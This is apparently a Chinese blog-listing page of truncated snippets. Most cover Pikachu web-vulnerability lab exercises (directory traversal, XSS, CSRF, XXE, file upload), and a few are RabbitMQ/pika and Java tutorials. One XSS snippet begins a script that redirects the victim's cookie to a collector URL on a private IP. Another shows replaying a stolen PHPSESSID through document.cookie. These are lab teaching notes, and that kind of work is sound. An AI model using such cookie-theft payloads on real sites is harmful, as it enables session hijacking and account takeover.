目录遍历: 在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。 当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件。 在这个过程中,如果后台没有对前端传进来的值进行严格的安全考虑,则攻击者可能会通过“.. ...
分类:
Web程序 时间:
2020-04-03 21:50:59
阅读次数:
145
如上图,我们获取到了cookie,接下来利用cookie登录相应的网站。 我用的浏览器是火狐,首先在特定的网站(也就是我们发现XSS漏洞的网站,这里指的是pikachu)F12打开开发者工具,找到控制台,在最下面输入: document.cookie = "PHPSESSID=ku7dfhu5cbi ...
分类:
Web程序 时间:
2020-03-29 18:02:52
阅读次数:
104
1. package xx; import java.util.Scanner; public class pika { public static void main(String[] args) { Scanner in =new Scanner(System.in); int a = in.n ...
分类:
其他好文 时间:
2020-03-26 12:21:59
阅读次数:
72
rabbitmq kafaka. 微博在用的 比rabbitmq强大的多 activemq rockemq mq 就是队列 防止大流量的并发,做一个缓冲 下载安装 https://www.rabbitmq.com/ 点击 Download+Installation using the Pika Py ...
分类:
其他好文 时间:
2020-03-14 23:39:41
阅读次数:
69
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 简单说下CSRF与XSS的区别: — ...
分类:
其他好文 时间:
2020-02-28 20:55:04
阅读次数:
72
部分图片来自于网络,如有侵权,请联系我及时删除~ 一、XXE的概念 1.1 什么是xml xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。 1.2 xml文档格式 1.3 simpl ...
分类:
其他好文 时间:
2020-02-27 14:37:42
阅读次数:
58
不安全的文件上传漏洞概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断 ...
分类:
Web程序 时间:
2020-02-24 00:46:19
阅读次数:
124
xss后台的安装 重定向到另一个可信网址 让点击者 不知情 1.cookie值获取 查看源代码 在反射型xss(get)页面下使用 <script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie= ...
分类:
其他好文 时间:
2020-02-12 19:02:30
阅读次数:
356
RabbitMQ是部署最广泛的开源消息代理。 RabbitMQ在全球范围内在小型初创公司和大型企业中进行了超过35,000次RabbitMQ生产部署,是最受欢迎的开源消息代理。 RabbitMQ轻量级,易于在内部和云中部署。它支持多种消息传递协议。RabbitMQ可以部署在分布式和联合配置中,以满足 ...
分类:
其他好文 时间:
2020-01-08 21:02:06
阅读次数:
82
一.基本使用 》》》 依据官方文档 (1)生产端 # python 操作我们rabbitMq 需要的模块 pika # pip install pika import pika # 建立和RabbitMQ的链接 connection = pika.BlockingConnection(pika.Co ...
分类:
其他好文 时间:
2019-12-26 17:44:50
阅读次数:
136
